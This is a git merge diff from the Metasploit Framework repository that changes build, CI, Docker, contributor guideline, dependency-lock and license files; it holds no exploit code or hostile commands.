Land #10221, Rescue RubySMB Error

Merge branch 'bump-payloads-287' into upstream-master

.dockerignore

@@ -5,8 +5,6 @@ docker-compose*.yml
 docker/
 !docker/msfconsole.rc
 !docker/entrypoint.sh
-!docker/database.yml
-Dockerfile
 README.md
 .git/
 .github/

.github/PULL_REQUEST_TEMPLATE.md

@@ -2,8 +2,6 @@
 Tell us what this change does. If you're fixing a bug, please mention
 the github issue number.
 
-Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.
-
 ## Verification
 
 List the steps needed to make sure this thing works

.gitignore

@@ -93,7 +93,3 @@ docker-compose.local*
 # Ignore python bytecode
 *.pyc
 rspec.failures
-
-
-#Ignore any base disk store files
-db/modules_metadata_base.pstore

.mailmap

@@ -64,6 +64,7 @@ wwebb-r7 <wwebb-r7@github>           <William_Webb@rapid7.com>
 
 bannedit <bannedit@github>             David Rude <bannedit0@gmail.com>
 bcoles <bcoles@github>                 bcoles <bcoles@gmail.com>
+bcoles <bcoles@github>                 Brendan Coles <bcoles@gmail.com>
 bokojan <bokojan@github>               parzamendi-r7 <peter_arzamendi@rapid7.com>
 brandonprry <brandonprry@github>       <bperry@brandons-mbp.attlocal.net>
 brandonprry <brandonprry@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
@@ -82,7 +83,6 @@ corelanc0d3r <corelanc0d3r@github>     corelanc0d3r <peter.ve@corelan.be>
 corelanc0d3r <corelanc0d3r@github>     Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
 crcatala <crcatala@github>             Christian Catalan <ccatalan@rapid7.com>
 darkoperator <darkoperator@github>     Carlos Perez <carlos_perez@darkoperator.com>
-DanielRTeixeira <DanielRTeixeira@github> Daniel Teixeira <danieljcrteixeira@gmail.com>
 efraintorres <efraintorres@github>     efraintorres <etlownoise@gmail.com>
 efraintorres <efraintorres@github>     et <>
 espreto <espreto@github>               <robertoespreto@gmail.com>

.ruby-version

@@ -1 +1 @@
-2.5.3
+2.5.1

.travis.yml

@@ -11,35 +11,25 @@ addons:
       - graphviz
 language: ruby
 rvm:
-  - '2.3.8'
-  - '2.4.5'
-  - '2.5.3'
+  - '2.3.7'
+  - '2.4.4'
+  - '2.5.1'
 
 env:
   - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
   - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
-  # Used for testing the remote data service
-  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
 
 matrix:
   fast_finish: true
-  exclude:
-  - rvm: '2.3.8'
-    env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
-  - rvm: '2.4.5'
-    env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
 
 jobs:
   # build docker image
   include:
-  - env: CMD="/usr/bin/docker-compose build" DOCKER="true"
+  - env: CMD="docker-compose build" DOCKER="true"
     # we do not need any setup
     before_install: skip
     install: skip
-    before_script:
-      - curl -L https://github.com/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` > docker-compose
-      - chmod +x docker-compose
-      - sudo mv docker-compose /usr/bin
+    before_script: skip
 before_install:
   - "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
   - rake --version
@@ -48,7 +38,6 @@ before_install:
   - ls -la ./.git/hooks
   - ./.git/hooks/post-merge
   # Update the bundler
-  - gem update --system
   - gem install bundler
 before_script:
   - cp config/database.yml.travis config/database.yml
@@ -60,9 +49,7 @@ before_script:
 script:
   - echo "${CMD}"
     # we need travis_wait because the Docker build job can take longer than 10 minutes
-    #- if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
-    # docker_wait is currently broken on travis-ci, so let's just run CMD directly for now
-  - bash -c "${CMD}"
+  - if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
 
 notifications:
   irc: "irc.freenode.org#msfnotify"

CODE_OF_CONDUCT.md

@@ -37,7 +37,7 @@ when an individual is representing the project or its community.
 Instances of abusive, harassing, or otherwise unacceptable behavior may be
 reported by contacting the project maintainers at msfdev@metasploit.com. If
 the incident involves a committer, you may report directly to
-caitlin_condon@rapid7.com or todb@metasploit.com.
+egypt@metasploit.com or todb@metasploit.com.
 
 All complaints will be reviewed and investigated and will result in a
 response that is deemed necessary and appropriate to the circumstances.

CONTRIBUTING.md

@@ -1,54 +1,82 @@
 # Hello, World!
 
 Thanks for your interest in making Metasploit -- and therefore, the
-world -- a better place!  Before you get started, review our
-[Code of Conduct].  There are mutliple ways to help beyond just writing code:
- - [Submit bugs and feature requests] with detailed information about your issue or idea.
- - [Help fellow users with open issues] or [help fellow committers test recent pull requests].
- - [Report a security vulnerability in Metasploit itself] to Rapid7.
- - Submit an updated or brand new module!  We are always eager for exploits, scanners, and new
-   integrations or features. Don't know where to start? Set up a [development environment], then head over to ExploitDB to look for [proof-of-concept exploits] that might make a good module.
+world -- a better place!
+
+Are you about to report a bug? Sorry to hear it. Here's our [Issue tracker].
+Please try to be as specific as you can about your problem; include steps
+to reproduce (cut and paste from your console output if it's helpful) and
+what you were expecting to happen.
+
+Are you about to report a security vulnerability in Metasploit itself?
+How ironic! Please take a look at Rapid7's [Vulnerability
+Disclosure Policy](https://www.rapid7.com/disclosure.jsp), and send
+your report to security@rapid7.com using our [PGP key].
+
+Are you about to contribute some new functionality, a bug fix, or a new
+Metasploit module? If so, read on...
 
 # Contributing to Metasploit
 
-Here's a short list of do's and don'ts to make sure *your* valuable contributions actually make
-it into Metasploit's master branch.  If you do not care to follow these rules, your contribution
-**will** be closed. Sorry!
+What you see here in CONTRIBUTING.md is a bullet point list of the do's
+and don'ts of how to make sure *your* valuable contributions actually
+make it into Metasploit's master branch.
+
+If you care not to follow these rules, your contribution **will** be
+closed. Sorry!
+
+This is intended to be a **short** list. The [wiki] is much more
+exhaustive and reveals many mysteries. If you read nothing else, take a
+look at the standard [development environment setup] guide
+and Metasploit's [Common Coding Mistakes].
 
 ## Code Contributions
 
-* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
+* **Do** stick to the [Ruby style guide].
+* **Do** get [Rubocop] relatively quiet against the code you are adding or modifying.
 * **Do** follow the [50/72 rule] for Git commit messages.
+* **Don't** use the default merge messages when merging from other branches.
 * **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
-* **Do** create a [topic branch] to work on instead of working directly on `master` to preserve the
-  history of your pull request.  See [PR#8000] for an example of losing commit history as soon as
-  you update your own master branch.
+* **Do** create a [topic branch] to work on instead of working directly on `master`.
+ If you do not send a PR from a topic branch, the history of your PR will be
+ lost as soon as you update your own master branch. See
+ https://github.com/rapid7/metasploit-framework/pull/8000 for an example of
+ this in action.
+
 
 ### Pull Requests
 
-* **Do** target your pull request to the **master branch**.
+* **Do** target your pull request to the **master branch**. Not staging, not develop, not release.
 * **Do** specify a descriptive title to make searching for your pull request easier.
 * **Do** include [console output], especially for witnessable effects in `msfconsole`.
 * **Do** list [verification steps] so your code is testable.
 * **Do** [reference associated issues] in your pull request description.
+* **Do** write [release notes] once a pull request is landed.
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.
 
-Pull request [PR#9966] is a good example to follow.
+Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
 
 #### New Modules
 
-* **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
-* **Do** use the many module mixin [API]s.
+* **Do** run `tools/dev/msftidy.rb` against your module and fix any errors or warnings that come up.
+  - It would be even better to set up `msftidy.rb` as a [pre-commit hook].
+* **Do** use the many module mixin [API]s. Wheel improvements are welcome; wheel reinventions, not so much.
 * **Don't** include more than one module per pull request.
 * **Do** include instructions on how to setup the vulnerable environment or software.
-* **Do** include [Module Documentation] showing sample run-throughs.
-* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and
-  anything "serious" can be done with post modules and local exploits.
+* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs.
+
+
+
+#### Scripts
+
+* **Don't** submit new [scripts].  Scripts are shipped as examples for
+  automating local tasks, and anything "serious" can be done with post
+  modules and local exploits.
 
 #### Library Code
 
-* **Do** write [RSpec] tests - even the smallest change in a library can break existing code.
+* **Do** write [RSpec] tests - even the smallest change in library land can thoroughly screw things up.
 * **Do** follow [Better Specs] - it's like the style guide for specs.
 * **Do** write [YARD] documentation - this makes it easier for people to use your code.
 * **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.
@@ -56,46 +84,44 @@ Pull request [PR#9966] is a good example to follow.
 #### Bug Fixes
 
 * **Do** include reproduction steps in the form of verification steps.
-* **Do** link to any corresponding [Issues] in the format of `See #1234` in your commit description.
+* **Do** include a link to any corresponding [Issues] in the format of
+  `See #1234` in your commit description.
 
 ## Bug Reports
 
-Please report vulnerabilities in Rapid7 software directly to security@rapid7.com. For more on our disclosure policy and Rapid7's approach to coordinated disclosure, [head over here](https://www.rapid7.com/security). 
-
-When reporting Metasploit issues:
+* **Do** report vulnerabilities in Rapid7 software directly to security@rapid7.com.
 * **Do** write a detailed description of your bug and use a descriptive title.
-* **Do** include reproduction steps, stack traces, and anything that might help us fix your bug.
+* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.
 * **Don't** file duplicate reports; search for your bug before filing a new report.
 
-If you need some more guidance, talk to the main body of open source contributors over on our
-[Metasploit Slack] or [#metasploit on Freenode IRC].
+If you need some more guidance, talk to the main body of open
+source contributors over on the [Freenode IRC channel],
+or e-mail us at the [metasploit-hackers] mailing list.
 
-Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
-curve, so keep it up!
+Also, **thank you** for taking the few moments to read this far! You're
+already way ahead of the curve, so keep it up!
 
-[Code of Conduct]:https://github.com/rapid7/metasploit-framework/wiki/CODE_OF_CONDUCT.md
-[Submit bugs and feature requests]:http://r-7.co/MSF-BUGv1
-[Help fellow users with open issues]:https://github.com/rapid7/metasploit-framework/issues
-[help fellow committers test recently submitted pull requests]:https://github.com/rapid7/metasploit-framework/pulls
-[Report a security vulnerability in Metasploit itself]:https://www.rapid7.com/disclosure.jsp
-[development environment]:http://r-7.co/MSF-DEV
-[proof-of-concept exploits]:https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true
+[Issue Tracker]:http://r-7.co/MSF-BUGv1
+[PGP key]:http://pgp.mit.edu:11371/pks/lookup?op=vindex&search=0x2380F85B8AD4DB8D
+[wiki]:https://github.com/rapid7/metasploit-framework/wiki
+[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
+[development environment setup]:http://r-7.co/MSF-DEV
+[Common Coding Mistakes]:https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
 [Ruby style guide]:https://github.com/bbatsov/ruby-style-guide
 [Rubocop]:https://rubygems.org/search?query=rubocop
 [50/72 rule]:http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html
 [topic branch]:http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches
-[PR#8000]:https://github.com/rapid7/metasploit-framework/pull/8000
 [console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
 [verification steps]:https://help.github.com/articles/writing-on-github#task-lists
 [reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
-[PR#9966]:https://github.com/rapid7/metasploit-framework/pull/9966
+[release notes]:https://github.com/rapid7/metasploit-framework/wiki/Adding-Release-Notes-to-PRs
+[PR#2940]:https://github.com/rapid7/metasploit-framework/pull/2940
+[PR#3043]:https://github.com/rapid7/metasploit-framework/pull/3043
 [pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
 [API]:https://rapid7.github.io/metasploit-framework/api
-[Module Documentation]:https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation
-[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
 [RSpec]:http://rspec.info
 [Better Specs]:http://betterspecs.org
 [YARD]:http://yardoc.org
 [Issues]:https://github.com/rapid7/metasploit-framework/issues
-[Metasploit Slack]:https://www.metasploit.com/slack
-[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
+[Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
+[metasploit-hackers]:https://groups.google.com/forum/#!forum/metasploit-hackers

CURRENT.md

@@ -1,20 +0,0 @@
-Active Metasploit 5 development will sometimes push aggressive changes.
-Integrations with 3rd-party tools, as well as general usage, may change quickly
-from day to day. Some of the steps for dealing with major changes will be
-documented here. We will continue to maintain the Metasploit 4.x branch until
-Metasploit 5.0 is released.
-
-**2018/01/17 - [internal] module cache reworked to not store metadata in PostgreSQL**
-
-Metasploit no longer stores module metadata in a PostgreSQL database, instead
-storing it in a cache file in your local ~/.msf4 config directory. This has a
-number of advantages:
-
- * Fast searches whether you have the database enabled or not (no more slow search mode)
- * Faster load time for msfconsole, the cache loads more quickly
- * Private module data is not uploaded to a shared database, no collisions
- * Adding or deleting modules no longer displays file-not-found error messages on start in msfconsole
- * Reduced memory consumption
-
-Code that reads directly from the Metasploit database for module data will need
-to use the new module search API.

Dockerfile

@@ -1,17 +1,31 @@
-FROM ruby:2.5.3-alpine3.7 AS builder
+FROM ruby:2.5.1-alpine3.7
 LABEL maintainer="Rapid7"
 
 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
-ENV APP_HOME=/usr/src/metasploit-framework
+ENV APP_HOME /usr/src/metasploit-framework/
+ENV NMAP_PRIVILEGED=""
 ENV BUNDLE_IGNORE_MESSAGES="true"
 WORKDIR $APP_HOME
 
-COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME/
+COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME
 COPY lib/metasploit/framework/version.rb $APP_HOME/lib/metasploit/framework/version.rb
 COPY lib/metasploit/framework/rails_version_constraint.rb $APP_HOME/lib/metasploit/framework/rails_version_constraint.rb
 COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb
 
-RUN apk add --no-cache \
+RUN apk update && \
+    apk add \
+      bash \
+      sqlite-libs \
+      nmap \
+      nmap-scripts \
+      nmap-nselibs \
+      postgresql-libs \
+      python \
+      python3 \
+      ncurses \
+      libcap \
+      su-exec \
+    && apk add --virtual .ruby-builddeps \
       autoconf \
       bison \
       build-base \
@@ -30,38 +44,20 @@ RUN apk add --no-cache \
     && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
     && gem update --system \
     && gem install bundler \
-    && bundle install --clean --no-cache --system $BUNDLER_ARGS \
-    # temp fix for https://github.com/bundler/bundler/issues/6680
-    && rm -rf /usr/local/bundle/cache \
-    # needed so non root users can read content of the bundle
-    && chmod -R a+r /usr/local/bundle
-
-
-FROM ruby:2.5.3-alpine3.7
-LABEL maintainer="Rapid7"
-
-ENV APP_HOME=/usr/src/metasploit-framework
-ENV NMAP_PRIVILEGED=""
-ENV METASPLOIT_GROUP=metasploit
-
-# used for the copy command
-RUN addgroup -S $METASPLOIT_GROUP
-
-RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python python3 ncurses libcap su-exec
+    && bundle install --system $BUNDLER_ARGS \
+    && apk del .ruby-builddeps \
+    && rm -rf /var/cache/apk/*
 
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
 
-COPY --chown=root:metasploit --from=builder /usr/local/bundle /usr/local/bundle
-COPY --chown=root:metasploit . $APP_HOME/
-RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
-
-WORKDIR $APP_HOME
+ADD ./ $APP_HOME
 
 # we need this entrypoint to dynamically create a user
 # matching the hosts UID and GID so we can mount something
 # from the users home directory. If the IDs don't match
-# it results in access denied errors.
+# it results in access denied errors. Once docker has
+# a solution for this we can revert it back to normal
 ENTRYPOINT ["docker/entrypoint.sh"]
 
-CMD ["./msfconsole", "-r", "docker/msfconsole.rc", "-y", "$APP_HOME/config/database.yml"]
+CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]

Gemfile

@@ -25,7 +25,7 @@ end
 
 group :development, :test do
   # automatically include factories from spec/factories
-  gem 'factory_bot_rails'
+  gem 'factory_girl_rails'
   # Make rspec output shorter and more useful
   gem 'fivemat'
   # running documentation generation tasks and rspec tasks
@@ -34,7 +34,6 @@ group :development, :test do
   # environment is development
   gem 'rspec-rails'
   gem 'rspec-rerun'
-  gem 'swagger-blocks'
 end
 
 group :test do

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (5.0.2)
+    metasploit-framework (4.16.64)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -9,21 +9,18 @@ PATH
       bcrypt
       bcrypt_pbkdf
       bit-struct
-      concurrent-ruby (= 1.0.5)
       dnsruby
-      ed25519
-      em-http-request
       faker
       filesize
       jsobfu
       json
       metasm
       metasploit-concern
-      metasploit-credential
+      metasploit-credential (< 3.0.0)
       metasploit-model
-      metasploit-payloads (= 1.3.58)
-      metasploit_data_models
-      metasploit_payloads-mettle (= 0.5.1)
+      metasploit-payloads (= 1.3.40)
+      metasploit_data_models (< 3.0.0)
+      metasploit_payloads-mettle (= 0.4.1)
       mqtt
       msgpack
       nessus_rest
@@ -65,13 +62,10 @@ PATH
       ruby_smb
       rubyntlm
       rubyzip
-      sinatra
       sqlite3
       sshkey
-      thin
       tzinfo
       tzinfo-data
-      warden
       windows_error
       xdr
       xmlrpc
@@ -80,27 +74,27 @@ GEM
   remote: https://rubygems.org/
   specs:
     Ascii85 (1.0.3)
-    actionpack (4.2.11)
-      actionview (= 4.2.11)
-      activesupport (= 4.2.11)
+    actionpack (4.2.10)
+      actionview (= 4.2.10)
+      activesupport (= 4.2.10)
       rack (~> 1.6)
       rack-test (~> 0.6.2)
       rails-dom-testing (~> 1.0, >= 1.0.5)
       rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (4.2.11)
-      activesupport (= 4.2.11)
+    actionview (4.2.10)
+      activesupport (= 4.2.10)
       builder (~> 3.1)
       erubis (~> 2.7.0)
       rails-dom-testing (~> 1.0, >= 1.0.5)
       rails-html-sanitizer (~> 1.0, >= 1.0.3)
-    activemodel (4.2.11)
-      activesupport (= 4.2.11)
+    activemodel (4.2.10)
+      activesupport (= 4.2.10)
       builder (~> 3.1)
-    activerecord (4.2.11)
-      activemodel (= 4.2.11)
-      activesupport (= 4.2.11)
+    activerecord (4.2.10)
+      activemodel (= 4.2.10)
+      activesupport (= 4.2.10)
       arel (~> 6.0)
-    activesupport (4.2.11)
+    activesupport (4.2.10)
       i18n (~> 0.7)
       minitest (~> 5.1)
       thread_safe (~> 0.3, >= 0.3.4)
@@ -109,53 +103,39 @@ GEM
       public_suffix (>= 2.0.2, < 4.0)
     afm (0.2.2)
     arel (6.0.4)
-    arel-helpers (2.8.0)
+    arel-helpers (2.7.0)
       activerecord (>= 3.1.0, < 6)
-    backports (3.11.4)
+    backports (3.11.3)
     bcrypt (3.1.12)
     bcrypt_pbkdf (1.0.0)
-    bindata (2.4.4)
+    bindata (2.4.3)
     bit-struct (0.16)
     builder (3.2.3)
     coderay (1.1.2)
     concurrent-ruby (1.0.5)
-    cookiejar (0.3.3)
     crass (1.0.4)
-    daemons (1.3.1)
     diff-lcs (1.3)
-    dnsruby (1.61.2)
-      addressable (~> 2.5)
+    dnsruby (1.60.2)
     docile (1.3.1)
-    ed25519 (1.2.4)
-    em-http-request (1.1.5)
-      addressable (>= 2.3.4)
-      cookiejar (!= 0.3.1)
-      em-socksify (>= 0.3)
-      eventmachine (>= 1.0.3)
-      http_parser.rb (>= 0.6.0)
-    em-socksify (0.3.2)
-      eventmachine (>= 1.0.0.beta.4)
     erubis (2.7.0)
-    eventmachine (1.2.7)
-    factory_bot (4.11.1)
+    factory_girl (4.9.0)
       activesupport (>= 3.0.0)
-    factory_bot_rails (4.11.1)
-      factory_bot (~> 4.11.1)
+    factory_girl_rails (4.9.0)
+      factory_girl (~> 4.9.0)
       railties (>= 3.0.0)
-    faker (1.9.1)
+    faker (1.8.7)
       i18n (>= 0.7)
-    faraday (0.15.4)
+    faraday (0.15.2)
       multipart-post (>= 1.2, < 3)
-    filesize (0.2.0)
-    fivemat (1.3.7)
+    filesize (0.1.1)
+    fivemat (1.3.6)
     hashery (2.1.2)
-    http_parser.rb (0.6.0)
     i18n (0.9.5)
       concurrent-ruby (~> 1.0)
     jsobfu (0.4.2)
       rkelly-remix
     json (2.1.0)
-    loofah (2.2.3)
+    loofah (2.2.2)
       crass (~> 1.0.2)
       nokogiri (>= 1.5.9)
     metasm (1.0.3)
@@ -163,12 +143,11 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-credential (3.0.2)
+    metasploit-credential (2.0.14)
       metasploit-concern
       metasploit-model
-      metasploit_data_models (>= 3.0.0)
-      net-ssh
-      pg (~> 0.15)
+      metasploit_data_models (< 3.0.0)
+      pg
       railties
       rex-socket
       rubyntlm
@@ -177,8 +156,8 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.3.58)
-    metasploit_data_models (3.0.4)
+    metasploit-payloads (1.3.40)
+    metasploit_data_models (2.0.16)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
       arel-helpers
@@ -188,28 +167,28 @@ GEM
       postgres_ext
       railties (~> 4.2.6)
       recog (~> 2.0)
-    metasploit_payloads-mettle (0.5.1)
-    method_source (0.9.2)
-    mini_portile2 (2.4.0)
+    metasploit_payloads-mettle (0.4.1)
+    method_source (0.9.0)
+    mini_portile2 (2.3.0)
     minitest (5.11.3)
     mqtt (0.5.0)
-    msgpack (1.2.6)
+    msgpack (1.2.4)
     multipart-post (2.0.0)
     nessus_rest (0.1.6)
-    net-ssh (5.1.0)
+    net-ssh (5.0.2)
     network_interface (0.0.2)
     nexpose (7.2.1)
-    nokogiri (1.10.1)
-      mini_portile2 (~> 2.4.0)
-    octokit (4.13.0)
+    nokogiri (1.8.3)
+      mini_portile2 (~> 2.3.0)
+    octokit (4.9.0)
       sawyer (~> 0.8.0, >= 0.5.3)
-    openssl-ccm (1.2.2)
+    openssl-ccm (1.2.1)
     openvas-omp (0.0.4)
     packetfu (1.1.13)
       pcaprub
     patch_finder (1.0.2)
-    pcaprub (0.13.0)
-    pdf-reader (2.2.0)
+    pcaprub (0.12.4)
+    pdf-reader (2.1.0)
       Ascii85 (~> 1.0.0)
       afm (~> 0.2.1)
       hashery (~> 2.0)
@@ -221,13 +200,11 @@ GEM
       activerecord (~> 4.0)
       arel (>= 4.0.1)
       pg_array_parser (~> 0.0.9)
-    pry (0.12.2)
+    pry (0.11.3)
       coderay (~> 1.1.0)
       method_source (~> 0.9.0)
-    public_suffix (3.0.3)
-    rack (1.6.11)
-    rack-protection (1.5.5)
-      rack
+    public_suffix (3.0.2)
+    rack (1.6.10)
     rack-test (0.6.3)
       rack (>= 1.0)
     rails-deprecated_sanitizer (1.0.3)
@@ -238,19 +215,19 @@ GEM
       rails-deprecated_sanitizer (>= 1.0.1)
     rails-html-sanitizer (1.0.4)
       loofah (~> 2.2, >= 2.2.2)
-    railties (4.2.11)
-      actionpack (= 4.2.11)
-      activesupport (= 4.2.11)
+    railties (4.2.10)
+      actionpack (= 4.2.10)
+      activesupport (= 4.2.10)
       rake (>= 0.8.7)
       thor (>= 0.18.1, < 2.0)
-    rake (12.3.2)
+    rake (12.3.1)
     rb-readline (0.5.5)
-    recog (2.1.45)
+    recog (2.1.19)
       nokogiri
     redcarpet (3.4.0)
     rex-arch (0.1.13)
       rex-text
-    rex-bin_tools (0.1.6)
+    rex-bin_tools (0.1.4)
       metasm
       rex-arch
       rex-core
@@ -261,7 +238,7 @@ GEM
       metasm
       rex-arch
       rex-text
-    rex-exploitation (0.1.20)
+    rex-exploitation (0.1.19)
       jsobfu
       metasm
       rex-arch
@@ -274,7 +251,7 @@ GEM
       rex-arch
     rex-ole (0.1.6)
       rex-text
-    rex-powershell (0.1.79)
+    rex-powershell (0.1.78)
       rex-random_identifier
       rex-text
     rex-random_identifier (0.1.4)
@@ -284,7 +261,7 @@ GEM
       metasm
       rex-core
       rex-text
-    rex-socket (0.1.15)
+    rex-socket (0.1.14)
       rex-core
     rex-sslscan (0.1.5)
       rex-core
@@ -295,37 +272,37 @@ GEM
     rex-zip (0.1.3)
       rex-text
     rkelly-remix (0.0.7)
-    rspec (3.8.0)
-      rspec-core (~> 3.8.0)
-      rspec-expectations (~> 3.8.0)
-      rspec-mocks (~> 3.8.0)
-    rspec-core (3.8.0)
-      rspec-support (~> 3.8.0)
-    rspec-expectations (3.8.2)
+    rspec (3.7.0)
+      rspec-core (~> 3.7.0)
+      rspec-expectations (~> 3.7.0)
+      rspec-mocks (~> 3.7.0)
+    rspec-core (3.7.1)
+      rspec-support (~> 3.7.0)
+    rspec-expectations (3.7.0)
       diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.8.0)
-    rspec-mocks (3.8.0)
+      rspec-support (~> 3.7.0)
+    rspec-mocks (3.7.0)
       diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.8.0)
-    rspec-rails (3.8.1)
+      rspec-support (~> 3.7.0)
+    rspec-rails (3.7.2)
       actionpack (>= 3.0)
       activesupport (>= 3.0)
       railties (>= 3.0)
-      rspec-core (~> 3.8.0)
-      rspec-expectations (~> 3.8.0)
-      rspec-mocks (~> 3.8.0)
-      rspec-support (~> 3.8.0)
+      rspec-core (~> 3.7.0)
+      rspec-expectations (~> 3.7.0)
+      rspec-mocks (~> 3.7.0)
+      rspec-support (~> 3.7.0)
     rspec-rerun (1.1.0)
       rspec (~> 3.0)
-    rspec-support (3.8.0)
-    ruby-macho (2.1.0)
+    rspec-support (3.7.1)
+    ruby-macho (1.2.0)
     ruby-rc4 (0.1.5)
-    ruby_smb (1.0.5)
+    ruby_smb (1.0.1)
       bindata
       rubyntlm
       windows_error
     rubyntlm (0.6.2)
-    rubyzip (1.2.2)
+    rubyzip (1.2.1)
     sawyer (0.8.1)
       addressable (>= 2.3.5, < 2.6)
       faraday (~> 0.8, < 1.0)
@@ -334,40 +311,28 @@ GEM
       json (>= 1.8, < 3)
       simplecov-html (~> 0.10.0)
     simplecov-html (0.10.2)
-    sinatra (1.4.8)
-      rack (~> 1.5)
-      rack-protection (~> 1.4)
-      tilt (>= 1.3, < 3)
     sqlite3 (1.3.13)
     sshkey (1.9.0)
-    swagger-blocks (2.0.2)
-    thin (1.7.2)
-      daemons (~> 1.0, >= 1.0.9)
-      eventmachine (~> 1.0, >= 1.0.4)
-      rack (>= 1, < 3)
-    thor (0.20.3)
+    thor (0.20.0)
     thread_safe (0.3.6)
-    tilt (2.0.9)
     timecop (0.9.1)
     ttfunk (1.5.1)
     tzinfo (1.2.5)
       thread_safe (~> 0.1)
-    tzinfo-data (1.2018.9)
+    tzinfo-data (1.2018.5)
       tzinfo (>= 1.0.0)
-    warden (1.2.7)
-      rack (>= 1.0)
     windows_error (0.1.2)
     xdr (2.0.0)
       activemodel (>= 4.2.7)
       activesupport (>= 4.2.7)
     xmlrpc (0.3.0)
-    yard (0.9.16)
+    yard (0.9.14)
 
 PLATFORMS
   ruby
 
 DEPENDENCIES
-  factory_bot_rails
+  factory_girl_rails
   fivemat
   metasploit-framework!
   octokit
@@ -377,9 +342,8 @@ DEPENDENCIES
   rspec-rails
   rspec-rerun
   simplecov
-  swagger-blocks
   timecop
   yard
 
 BUNDLED WITH
-   1.17.3
+   1.16.1

LICENSE

@@ -71,6 +71,10 @@ Files: lib/anemone.rb lib/anemone/*
 Copyright: 2009 Vertive, Inc.
 License: MIT
 
+Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
+Copyright: 2006-2010 Yoann GUILLOT
+License: LGPL-2.1
+
 Files: lib/msf/core/modules/external/python/async_timeout/*
 Copyright: 2016-2017 Andrew Svetlov
 License: Apache 2.0
@@ -111,10 +115,6 @@ Files: data/webcam/api.js
 Copyright: Copyright 2013 Muaz Khan<@muazkh>.
 License: MIT
 
-Files: lib/msf/core/web_services/public/*, lib/msf/core/web_services/views/api_docs.erb
-Copyright: Copyright 2018 SmartBear Software
-License: Apache 2.0
-
 License: BSD-2-clause
  Redistribution and use in source and binary forms, with or without modification,
  are permitted provided that the following conditions are met:

LICENSE_GEMS

@@ -1,136 +1,130 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
-Ascii85, 1.0.3, MIT
-actionpack, 4.2.11, MIT
-actionview, 4.2.11, MIT
-activemodel, 4.2.11, MIT
-activerecord, 4.2.11, MIT
-activesupport, 4.2.11, MIT
-addressable, 2.5.2, "Apache 2.0"
+Ascii85, 1.0.2, MIT
+actionpack, 4.2.9, MIT
+actionview, 4.2.9, MIT
+activemodel, 4.2.9, MIT
+activerecord, 4.2.9, MIT
+activesupport, 4.2.9, MIT
+addressable, 2.5.1, "Apache 2.0"
 afm, 0.2.2, MIT
 arel, 6.0.4, MIT
-arel-helpers, 2.8.0, MIT
-backports, 3.11.4, MIT
-bcrypt, 3.1.12, MIT
-bcrypt_pbkdf, 1.0.0, MIT
